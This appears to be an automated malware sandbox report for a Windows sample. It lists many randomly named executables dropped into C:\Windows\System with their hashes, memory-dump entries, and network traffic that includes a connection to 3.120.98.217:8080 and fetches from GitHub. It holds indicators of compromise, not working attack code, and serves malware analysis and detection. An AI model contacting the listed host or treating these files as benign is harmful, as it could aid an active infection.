C:\Windows\System\IliPUAO.exe

C:\Windows\System\IliPUAO.exe

C:\Windows\System\yrOWKeP.exe

C:\Windows\System\yrOWKeP.exe

C:\Windows\System\NGCcert.exe

C:\Windows\System\NGCcert.exe

C:\Windows\System\NHdmEVu.exe

C:\Windows\System\NHdmEVu.exe

C:\Windows\System\oZwyLvB.exe

C:\Windows\System\oZwyLvB.exe

C:\Windows\System\KNQrKEW.exe

C:\Windows\System\KNQrKEW.exe

C:\Windows\System\qITRGCn.exe

C:\Windows\System\qITRGCn.exe

C:\Windows\System\WniuSHC.exe

C:\Windows\System\WniuSHC.exe

C:\Windows\System\pjejWwo.exe

C:\Windows\System\pjejWwo.exe

C:\Windows\System\DOPJgwd.exe

C:\Windows\System\DOPJgwd.exe

C:\Windows\System\NvtEyCo.exe

C:\Windows\System\NvtEyCo.exe

C:\Windows\System\bsVPxub.exe

C:\Windows\System\bsVPxub.exe

C:\Windows\System\DZlxcGy.exe

C:\Windows\System\DZlxcGy.exe

C:\Windows\System\DvXZBui.exe

C:\Windows\System\DvXZBui.exe

C:\Windows\System\bONIJct.exe

C:\Windows\System\bONIJct.exe

C:\Windows\System\kpdSjDN.exe

C:\Windows\System\kpdSjDN.exe

C:\Windows\System\PDDhckd.exe

C:\Windows\System\PDDhckd.exe

C:\Windows\System\BOpCcXU.exe

C:\Windows\System\BOpCcXU.exe

C:\Windows\System\YBWJdaY.exe

C:\Windows\System\YBWJdaY.exe

C:\Windows\System\rTcJTnj.exe

C:\Windows\System\rTcJTnj.exe

C:\Windows\System\LHHwFld.exe

C:\Windows\System\LHHwFld.exe

C:\Windows\System\MdlYtdK.exe

C:\Windows\System\MdlYtdK.exe

C:\Windows\System\gAETMkX.exe

C:\Windows\System\gAETMkX.exe

C:\Windows\System\rcaFrqq.exe

C:\Windows\System\rcaFrqq.exe

C:\Windows\System\VdakHeq.exe

C:\Windows\System\VdakHeq.exe

C:\Windows\System\MXSmFDk.exe

C:\Windows\System\MXSmFDk.exe

C:\Windows\System\YayCLMQ.exe

C:\Windows\System\YayCLMQ.exe

C:\Windows\System\tBmVsRI.exe

C:\Windows\System\tBmVsRI.exe

C:\Windows\System\DpEiSXy.exe

C:\Windows\System\DpEiSXy.exe

C:\Windows\System\DytptnR.exe

C:\Windows\System\DytptnR.exe

C:\Windows\System\MhjTCsX.exe

C:\Windows\System\MhjTCsX.exe

C:\Windows\System\GbAshVF.exe

C:\Windows\System\GbAshVF.exe

C:\Windows\System\yNEBSdA.exe

C:\Windows\System\yNEBSdA.exe

C:\Windows\System\XnxBeGs.exe

C:\Windows\System\XnxBeGs.exe

C:\Windows\System\dWFMiGf.exe

C:\Windows\System\dWFMiGf.exe

C:\Windows\System\ihqDvVS.exe

C:\Windows\System\ihqDvVS.exe

C:\Windows\System\DXnpCiR.exe

C:\Windows\System\DXnpCiR.exe

C:\Windows\System\qKrISxz.exe

C:\Windows\System\qKrISxz.exe

C:\Windows\System\fUwJKeL.exe

C:\Windows\System\fUwJKeL.exe

C:\Windows\System\vIGbgcV.exe

C:\Windows\System\vIGbgcV.exe

C:\Windows\System\SDYJkVU.exe

C:\Windows\System\SDYJkVU.exe

C:\Windows\System\cvEiHcQ.exe

C:\Windows\System\cvEiHcQ.exe

C:\Windows\System\GvRUBxY.exe

C:\Windows\System\GvRUBxY.exe

C:\Windows\System\YitLOuA.exe

C:\Windows\System\YitLOuA.exe

C:\Windows\System\VybOVLh.exe

C:\Windows\System\VybOVLh.exe

C:\Windows\System\IVwOXkM.exe

C:\Windows\System\IVwOXkM.exe

C:\Windows\System\tztFTJu.exe

C:\Windows\System\tztFTJu.exe

C:\Windows\System\TpwtOuP.exe

C:\Windows\System\TpwtOuP.exe

C:\Windows\System\QrMhiSC.exe

C:\Windows\System\QrMhiSC.exe

C:\Windows\System\rQosHeg.exe

C:\Windows\System\rQosHeg.exe

C:\Windows\System\lWobXkZ.exe

C:\Windows\System\lWobXkZ.exe

C:\Windows\System\aCgNHUu.exe

C:\Windows\System\aCgNHUu.exe

C:\Windows\System\iYlyKgc.exe

C:\Windows\System\iYlyKgc.exe

C:\Windows\System\QENZfOV.exe

C:\Windows\System\QENZfOV.exe

C:\Windows\System\PbzTkPV.exe

C:\Windows\System\PbzTkPV.exe

C:\Windows\System\lEGRcHG.exe

C:\Windows\System\lEGRcHG.exe

C:\Windows\System\RUUqmfG.exe

C:\Windows\System\RUUqmfG.exe

C:\Windows\System\CQfjwjn.exe

C:\Windows\System\CQfjwjn.exe

C:\Windows\System\qaBCRfS.exe

C:\Windows\System\qaBCRfS.exe

C:\Windows\System\sNkREsR.exe

C:\Windows\System\sNkREsR.exe

C:\Windows\System\HdQboJT.exe

C:\Windows\System\HdQboJT.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 8.8.8.8:53 154.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 35.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 98.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 88.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

memory/1920-0-0x00007FF6CCEA0000-0x00007FF6CD296000-memory.dmp

memory/1920-1-0x0000020912970000-0x0000020912980000-memory.dmp

C:\Windows\System\OQZXQuP.exe

MD5 f5955ba483ad17b9ae32a7b8c976a9c2
SHA1 5b585df6ec2f7ea31af8da90f5f5645d2ee8a55c
SHA256 bb0d27195999be4d1ecfbcdd33d1b7f2e3efb6c14c0b9ce9d17e9bfc7a9b79b6
SHA512 85dad3944c34410f3d092b1d27ba8e4dd8e24b246939e40ca62f2aaa553b9a5a52b4124847b39c19917075e41866cbbe669b978417cb27a92cfa07a035193ed8

C:\Windows\System\UqERfDb.exe

MD5 43c9119bb3b7f553aa64ef3b05195f73
SHA1 be0ddcdd7eba419ce037466047ad8b698a971847
SHA256 0de06f88a74b20e4077135e5984f2acd6853cb13612a49c767a1a78ec219029d
SHA512 e4a6151a8535c024b31132d66efb7c51e858961d5548d8da4b616291d246aa8e2391cef84fb5d6c97b828da8fb3d82203e3033907e6fcdfb04b018eeb71b0a54

C:\Windows\System\fFnfMUL.exe

MD5 35b0510333291668dae6c9875a1e5424
SHA1 8d7d3cf0cf75c81c000f3bd786384246185165f4
SHA256 0266e07dc3c3cf2af89dc528b4b93a087195ded518b01a62722cdac12985a69b
SHA512 56b7ee02a93c37cda9f1f3dd5df61c0c28bc8d544c14f50ec17d62506509adf0e423681f74209bf12357f564a4a22d20adc931088ee7f4c5e99a93e04730cd40

memory/4468-42-0x0000023624290000-0x00000236242B2000-memory.dmp

C:\Windows\System\VoQXMRm.exe

MD5 3cecaf370d9b573e13875a4823bc4efb
SHA1 a2a1edae38ebf3e26c02b1b7a0d38cfb687d68c7
SHA256 c2fbbb69390baa3e46f89de7a55549c31d5dd4bfa908bb2bfde48fb627c57d16
SHA512 d71cd731418b0bad9d618c30f8162eb2f322c73b1f4b831955450edff22259bb844a0905dd617e7ad0b37067d0e6e0ccbaefcdc0d3224c08be61cae0c2881b80

C:\Windows\System\SEWrPAq.exe

MD5 e5cd6f761378ca895d58a6347cfea871
SHA1 403a6158795ee9d234356ff9db0b6926d48d5f38
SHA256 3405889fc6cfc5910cf948ed40f70131f2c1d747b6cbe1478b2067ef210f15b7
SHA512 4ecedc4563a4ebd654221c2916d0190cd15ab4a56c43f1f2a728c343b6dc5dc090abf1ad768cab49b967fee458c082182201f6da7dc5fdec66e3bcc2bf1a4500

C:\Windows\System\eVyxpoj.exe

MD5 701be35c086dd8630cb12b60d4c22527
SHA1 7ca1f5c1e7960fb5d8cbd08b5a3bdd46d9252fda
SHA256 f73812a446155d15e3f886dad5ddb1bddea77c2e8f46e9630663330951e84781
SHA512 e2c33e9986a8c2b4efe4e9ee0c6f66c8fe7b1e9ccb5b98300c6b47957aa870b68b5fa4d508ae50abeb3b0045c19b5c11e8ba9d5f581de847953ca758efa88d48

C:\Windows\System\hAglDlU.exe

MD5 9d9c49ed77209b55b413140cbefcc85b
SHA1 c5e7dfb8f6406bf1635f5c5c380dd93481419f88
SHA256 f414eb1b3680dd23cfe863e1b2dc800c0e7655c6a03c20edec21176c7adfffb8
SHA512 7e8349510c913a9782c769d43647f4099afb55971a64adba996156bb4c74875f7566ce9bf5398fd5e52b3cbccbeaac120f783b163ba80263a20427bbb79be1e2

C:\Windows\System\MyCNbMq.exe

MD5 89621435b5047d5268764155c5d218bf
SHA1 5b8dd694e33a21ab58c29703890b24a3aa5d30f3
SHA256 6ae764bee7917a7c64d68670a10fba5c580c8c49b48ca6b30e8589e67d34022e
SHA512 13d271a4947bf211a6bde3bc5feecfe3571da32fb60010eea5677d7b61e03fa8b15d6ccf2274ceeb632d5346431b34fdf52407a2e2ae17c42d556d6207c86b50

C:\Windows\System\KjSrPfr.exe

MD5 0be50a68a26e258bc39ee6701c60a554
SHA1 c8bcbc827b73ab8f1df8a8fc7ec389f36c24206d
SHA256 b63a332e7ffff90f90fe7e85e84d38793343c70fac2a094751e94062c7a29739
SHA512 04ddee03f5d1265fdcbec9f6fdb2757878d6dcb7be2dbba0c571554adb856695cd80d0d72aeb6e9a96658066e0c66020561b639968fc2809c76280976d006568

C:\Windows\System\TNCjteE.exe

MD5 8d9398bd5abd6c984306187af79dd3fb
SHA1 db8e86fc9570f6f0aa84c6850fe1537fed311653
SHA256 87ce985dbeb718af2086203f86fdbef037d4ee662b8ad176d2a8f112e4fbb33b
SHA512 ebb24368c10531cdeb5a1df603b353f981f7b66754543e4aa2120ecc35d71d132256f216e0a7c84135bbb6c9b2298815f9104ede04b5f64e425a4325713e9b97

C:\Windows\System\CnDzQhq.exe

MD5 23b890f0918d843abdaff36ab1beaf07
SHA1 9315faa1b195fc775001eae509f37e7d28681aad
SHA256 21d1f46dc97d5fc02dfe4b1b19cd95fde645bf754c4c16133a6f8cb8a874c891
SHA512 230256e90e215a29003dd3b073ed1cb3c86b0739834390bba4369f0f81e7bc86edb2c946441525c010a086654f28ae7d425d0ab7e404a74ba1bb0e76c7eed6fa

C:\Windows\System\ghXMNdx.exe

MD5 8e95f213102414b08fa1478c88359daf
SHA1 27df4dd51cade53d2444abb23bc563c1e0aac93c
SHA256 2ab3a864b56f6742c12e32a7948f2bc0b0ee77648f117625e53674f20d22557c
SHA512 44b765af7c8a0d6be92de7f84b6a67cdc68a92a850e3fa73e37176e0032c02b8bea297e2b165978d4bd785792e03a5650d4dad53f44ac84dc3f6290324212214

C:\Windows\System\qgmgYui.exe

MD5 2a6ec0e928770e18e6eb7a138964d75e
SHA1 9fd716e514459c6b8dd16c387f03066666cd2dd1
SHA256 0db3a8604064d25cd9cb1648332f1b987bd5c50f5f90266729048faba8ce0966
SHA512 f82bc6e0707265847c0e84c66e5707f3ea4f3f7f7008213591b26655ee7ccb12f85905836a6576e6aeab17cf11ee3d476226e5f94ef77a9e3ca76284531a248c

memory/3824-783-0x00007FF6C7EE0000-0x00007FF6C82D6000-memory.dmp

memory/1444-784-0x00007FF7FE010000-0x00007FF7FE406000-memory.dmp

memory/1376-802-0x00007FF702770000-0x00007FF702B66000-memory.dmp

memory/3500-816-0x00007FF6A5000000-0x00007FF6A53F6000-memory.dmp

memory/2080-818-0x00007FF7B3900000-0x00007FF7B3CF6000-memory.dmp

memory/4000-823-0x00007FF6B7B90000-0x00007FF6B7F86000-memory.dmp

memory/3320-829-0x00007FF773DE0000-0x00007FF7741D6000-memory.dmp

memory/2760-832-0x00007FF70F9D0000-0x00007FF70FDC6000-memory.dmp

memory/2808-835-0x00007FF60A500000-0x00007FF60A8F6000-memory.dmp

memory/3252-839-0x00007FF6BB370000-0x00007FF6BB766000-memory.dmp

memory/3740-842-0x00007FF71AB60000-0x00007FF71AF56000-memory.dmp

memory/2248-847-0x00007FF776C20000-0x00007FF777016000-memory.dmp

memory/4080-848-0x00007FF766B80000-0x00007FF766F76000-memory.dmp

memory/2948-857-0x00007FF6CDE20000-0x00007FF6CE216000-memory.dmp

memory/892-858-0x00007FF7DDC90000-0x00007FF7DE086000-memory.dmp

memory/2956-854-0x00007FF78AAB0000-0x00007FF78AEA6000-memory.dmp

memory/2292-853-0x00007FF6A3DD0000-0x00007FF6A41C6000-memory.dmp

memory/1084-846-0x00007FF7E5410000-0x00007FF7E5806000-memory.dmp

memory/2964-838-0x00007FF70A3B0000-0x00007FF70A7A6000-memory.dmp

memory/3720-833-0x00007FF773D00000-0x00007FF7740F6000-memory.dmp

memory/2208-812-0x00007FF654580000-0x00007FF654976000-memory.dmp

memory/2332-809-0x00007FF6F6840000-0x00007FF6F6C36000-memory.dmp

memory/2596-794-0x00007FF667D50000-0x00007FF668146000-memory.dmp

memory/4468-435-0x00000236270B0000-0x0000023627856000-memory.dmp

C:\Windows\System\pgDfvIh.exe

MD5 055564ccf764b5fb921ce150d7810ccc
SHA1 c349a1182a7156fb37088f42471030870a06c023
SHA256 9fef5bbad000b87b2dfb9747215da85df006927589f5a0875d9e2f0fecba5057
SHA512 fd9def1d97829ea27019d35e3faee8dbc0d113dff857e7778fc6d3d9b3c2ca7f9faf718fd3eb76fbc99f311b02b770efd75f00596a40fe026352d3e7265210bb

C:\Windows\System\TGajqON.exe

MD5 3f0d72768aa9294dbb45798bb4e1512d
SHA1 c21b4c655c66cb2b61100ad3ba447ef7fb19463d
SHA256 a2430b558649ef5745483ecec84ff7678d7250983fcc6962f1433d5b9f085eb0
SHA512 1a3563acbdc96e806ac91cc71090761076974a50e38a122b49ca679d6a53440e66412e23b2de7568bcd5a8ae2ae1521d45f26e2c429ee5c5d3174d6df63fd0cd

C:\Windows\System\uGBIftN.exe

MD5 58a08e0cbf4c869f2aebd9c0221b7d3b
SHA1 7d0965391ea4ba4665385e82bb77397f812dbd36
SHA256 24457fb8b0ab83ccab7e52ba2dd85c5699e155564f778d5819b8227b61961fb5
SHA512 5c77a0f114821f0b2996ba8fd8404e885c2ae4537fc912a336919c44caf29dadb984e0c7d89c1d0abe6768425c47d0d5fdaa502e8cebc630ed245d206a27d5ab

C:\Windows\System\oCNWiQY.exe

MD5 22e200665ac4f83ee9b2f30578baea1c
SHA1 135247611533c3fa1843bb2c8bc18be3d88ba039
SHA256 986e5ce20e91eabed56ece87b943f13c1b3cd0f0cad9b4a7f5a8cfcafbb9be75
SHA512 1517edd9532e914b51aae52e29b38b1c5db3fe3a689a37308b78ace46cb984d1acf2852f8bd22b0f361c9d8354c288343dbb5f61013910e65ebd387ab1fcc596

C:\Windows\System\FpbnwVO.exe

MD5 a1aff5a600e8e590ee9ecb41a01f3290
SHA1 6975837be1309d89a8840c46d0f530af83ab68a5
SHA256 ac4af1823755fff2239eddaba48d3f86fb2888bb2fb653b9b9379c1174c6a005
SHA512 3628bfa00e36071b13b7202c692e87c4e23b799300c03b786f9c9a00a86787a56702e4a7d77b9d2b262d779039cd9dffdbb79fea8e6abf5956d90c7d90d91a9c

C:\Windows\System\rUkxiYq.exe

MD5 01a5949471542d2418b60bae824bfe7e
SHA1 d34e0daa66a3505d84e01d3f0b62424185477c96
SHA256 a6a74dc69d0f6216029df3c45f4204ce2644863e63f19d2ee8999e04513c3ef1
SHA512 baefb1cff83978e9c20db18e7070a04ea18ad3261d0c3b42939cb38ad8a710bf2b546a4b0042ed5c5f1b2343fa8487c25cf17d79b94d139c83b38d4bebec8429

C:\Windows\System\ipmiTZu.exe

MD5 d7ddc4ac0ce945f6104ad52e1909b5ef
SHA1 4279292e4142b9a3c3af8be9c6057e3dab302b4c
SHA256 053f0f3d551cc1bac8d84e027d31f19882980519637096c3562fcbc85e4841a3
SHA512 bad51e24c516492bb4e44a7a4a9b142154c2172a95ecd8c4d6ae53a646648ac9bde5e84131c6a7dac448e4da2fbc96b6b91cdac2b76c59b02c883ed444d102fe

C:\Windows\System\XVAUXyo.exe

MD5 b4145ab731efe366d478d013e93e7d26
SHA1 12c486c8d55402ea63e276ad916ef3b8cb6e06ee
SHA256 987a1975b6639b33979e0ac08d2abf3428db9b1533917d086c4f23a36cf5dbe5
SHA512 09360f10f7b4154af7877a57489f4416120c40a1b69a39a4a69f04f0cf38913e4835aedd781c79c008eb6b4b0969ca5b8a0ad14b9db407b2b32e9f46b2797eb8

C:\Windows\System\BCfawpd.exe

MD5 73a8c7e956e4b934c982a4197d44c01d
SHA1 f7529541720f62e0f0c3818a2661b4cb63a08851
SHA256 80e54052efc02755fa8f5609181e0ff1e08e06e6a6bd7050ed966b5069494fa0
SHA512 2ddd7a9f05d451d65ee7017e169e9529a4e27004b0feaa5dd77d58a413d58234f83a6d68a59af94104f2b136cf6677c145473c52e53fff001c87c9d9d3af7cb4

C:\Windows\System\vPFxrLo.exe

MD5 8ff3f5af8440f50e0d7530698e9e8aad
SHA1 ed1c99e3502af5840cdd674a4cc23e00d3dc42a1
SHA256 339b0578c451ad0e72ac402065630c6a8afa4621326b927e26598a3bb618fd01
SHA512 b59a1e08af0e83c4a0a3424159a690b5c20b92877f9e81abd8f6dce3e490c51c4eb0294441c484d942d010df6c879fb663dc68bc2a5f2f5c700934910dc9be2e

C:\Windows\System\wNXPxVA.exe

MD5 fc5ce036f71dd829e367ae99bef7e0b0
SHA1 1771803e4b6db91f04a7facfc5e61efee291db0a
SHA256 7538b1d1c1cf28680df11f0d9ce9de4e0866193cde592d59553792af9c0f9e22
SHA512 496d45c0e65151f6e86899a97da22a2a26c9d702b1d60a6558d0284655ca3d955b7e1e806988882d8e407409144d56f5c1c41a96d880dc64f4489109aa905070

C:\Windows\System\YJpnhyR.exe

MD5 1c01e3f37d452ce66e5955485d49a4d4
SHA1 2e09711e2255340975e9ae2a737628085dea7a7f
SHA256 c011d222725495d8ecb81a244095bfda9708dc4d10942f83733c3ea8b6c5f241
SHA512 7c89e7a93b7470f2670b772e2ccb5c8c2e201d607edf4f54ac94db5021900a7acbc91e00030366e6cacb4d30ff01c431d535a1d4298ef567aad95c78bd74d7bb

C:\Windows\System\bLbAGKl.exe

MD5 ebb4475b29d81ce7ec14d638f10e987f
SHA1 c8db21cdd1b0fca98d1d413abc720825437d4ecc
SHA256 935bf73e2a759ab75c8574551f61191c41c7520f5f1780719df3b9aa18e865d9
SHA512 f23295cf2e86bbace8f52b0564c8be1e04e7b8cd15cba91fad86417ee856edd5ac9190103a3879a5cb497f85d75e303e3c3a34f317988cf6203ba6d40adcc608

C:\Windows\System\lbFJgkS.exe

MD5 06126732a6d4d0100dd2b855756dba85
SHA1 35fda5629aa94e8a570823ecbf6931333859cdda
SHA256 9de51f0ab94fae8242279fccdcb65954ffaab877f4f8310dbd35e42534c723fd
SHA512 412abdbafc46c8ec24712ad4261cd20d72e730392a3c50f7153aa5729a7fcb66fda70e5853a767903f5a784f6c54e360e0aa6f9f9e6bbc82ead331cca4296f1f

C:\Windows\System\KSyLfCf.exe

MD5 411e765715278ae79a1ce89aaeae0ca2
SHA1 6f220957b3394ccaf5b32c11d33c8fa5e05fe1f4
SHA256 9fb4e4bdd24db7d47be57c80b875b1baffdbac7cb993036763083f2fc9479b9c
SHA512 0d084b22aa3d759648ee17a22719a01e3b3b2135cbd2c7402ce17f756b32f2a1b900b4698fe15338187b4f43b2e71e26f5c0229df096c8b019655d11d8b889cc

C:\Windows\System\fZvysLD.exe

MD5 55882f2f28c09b69330182b88135dbee
SHA1 5bc7519534710c982f97201e63a45ca8e5352b5d
SHA256 09ee7aa7fd1377026ce2d6aa65e082c89daac875bf96689397e5cc1eb66017dc
SHA512 5a3bb1c2393a72d3f48b99748169cac6747ec56132da1f1f0760e6275a54564827267cf0dc9522560c6843b530fd90ee7a606db5a95ac8d93eac67ecacfc5462

C:\Windows\System\lcohyhA.exe

MD5 b7067a853d85673a766c98f7516e6e96
SHA1 c87b4b2a01fa48b67d73c5ffc5c9a0dae066216e
SHA256 30a5d9bdc1c73ee191225c8bdcd094b0e751efa7f347b1609094663acf428f75
SHA512 ae18979c4642de66fb00cd69043ffa294d77b9c6272bd0ce22f81d4de52d62e6fbc331fb25a4e680d3c9e4d0b63ac68d436f10f2ef79b42d922aaebeac64ad64

C:\Windows\System\zLpQsMN.exe

MD5 ef06884ea57ecae3d904de398d961f37
SHA1 5c62da50a0e2c638c3057fff032c7b344b5d62e0
SHA256 e7a41faf4985aec5f34ca839627b0eb00a613c90f28a70f4efc5995b37d6d532
SHA512 f8ac5cf4820b9eeefaaf8550eb7cb74138276d9ecc49fbc49200a2cb35d7480a8e11dd9b263de96212b7cf239d4bad68bbe2985a021dd1f98267325556ba8f0d

memory/4468-52-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wamp5wxi.k5h.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3708-30-0x00007FF6E6910000-0x00007FF6E6D06000-memory.dmp

C:\Windows\System\ayZoGgd.exe

MD5 a29a3654d15f3075e764fa79a4db1790
SHA1 d56e5ec37a6b107e25a5baecf139789d10d7b82e
SHA256 91868604f4658b8ea2aa95a5caa3dc137a4e7eedaf61854ecd2693f08f032e3d
SHA512 3817ceb12429dd637cfeac049c29d0ac00e8ddc0b90649c7abfc6b2db11b7ca3d746973d85879dc7099c2999832948013177e5c378f4018b4d3aa4ed6dce82e1

memory/4468-23-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

C:\Windows\System\dWmosVM.exe

MD5 3e5c3004d9b75e81bfd799564facb722
SHA1 a647087383f419a6247addbb2ae3285c73a0c662
SHA256 ede88c96272bbac256f53a333b779868d707fe69612727dfbd07bd56443bc818
SHA512 724eb85c7910a5c74a70f5a57be92fd32696f0b988705d30a9ae94dfba382af424aa3a5e546b9151f89e626c5c9706fe13ef0e7ba7231a4e4bf92ec9a483300a

memory/4468-5-0x00007FFEE9C43000-0x00007FFEE9C45000-memory.dmp

C:\Windows\System\yALjfeh.exe

MD5 4585af961e6be7f3b03d075298565b62
SHA1 8e84c60639225761f581ea4ec1ff9a2d8e5472c9
SHA256 b8920be4ca9181e84576dfb449141c7d9af40d7ddc5588ea3cac8c68ef3a0a88
SHA512 aca862ef42a6056537a17dcbf9d8778efa38fbecbcb6ce3dce02a2eb0f5b9ffb56a667b21c26a29159a0ebcd14d21a77c5b25a36880c46863acba28da90e75f0

memory/4468-2253-0x00007FFEE9C43000-0x00007FFEE9C45000-memory.dmp

memory/4468-2254-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

memory/2956-2255-0x00007FF78AAB0000-0x00007FF78AEA6000-memory.dmp

memory/3824-2256-0x00007FF6C7EE0000-0x00007FF6C82D6000-memory.dmp

memory/3708-2257-0x00007FF6E6910000-0x00007FF6E6D06000-memory.dmp

memory/2948-2260-0x00007FF6CDE20000-0x00007FF6CE216000-memory.dmp

memory/1376-2262-0x00007FF702770000-0x00007FF702B66000-memory.dmp

memory/2332-2261-0x00007FF6F6840000-0x00007FF6F6C36000-memory.dmp

memory/2596-2259-0x00007FF667D50000-0x00007FF668146000-memory.dmp

memory/1444-2258-0x00007FF7FE010000-0x00007FF7FE406000-memory.dmp

memory/3252-2265-0x00007FF6BB370000-0x00007FF6BB766000-memory.dmp

memory/2248-2264-0x00007FF776C20000-0x00007FF777016000-memory.dmp

memory/4000-2266-0x00007FF6B7B90000-0x00007FF6B7F86000-memory.dmp

memory/2080-2278-0x00007FF7B3900000-0x00007FF7B3CF6000-memory.dmp

memory/3500-2277-0x00007FF6A5000000-0x00007FF6A53F6000-memory.dmp

memory/2208-2276-0x00007FF654580000-0x00007FF654976000-memory.dmp

memory/892-2275-0x00007FF7DDC90000-0x00007FF7DE086000-memory.dmp

memory/1084-2274-0x00007FF7E5410000-0x00007FF7E5806000-memory.dmp

memory/3740-2273-0x00007FF71AB60000-0x00007FF71AF56000-memory.dmp

memory/2964-2272-0x00007FF70A3B0000-0x00007FF70A7A6000-memory.dmp

memory/2808-2271-0x00007FF60A500000-0x00007FF60A8F6000-memory.dmp

memory/3720-2270-0x00007FF773D00000-0x00007FF7740F6000-memory.dmp

memory/2760-2269-0x00007FF70F9D0000-0x00007FF70FDC6000-memory.dmp

memory/4080-2268-0x00007FF766B80000-0x00007FF766F76000-memory.dmp

memory/3320-2267-0x00007FF773DE0000-0x00007FF7741D6000-memory.dmp

memory/2292-2263-0x00007FF6A3DD0000-0x00007FF6A41C6000-memory.dmp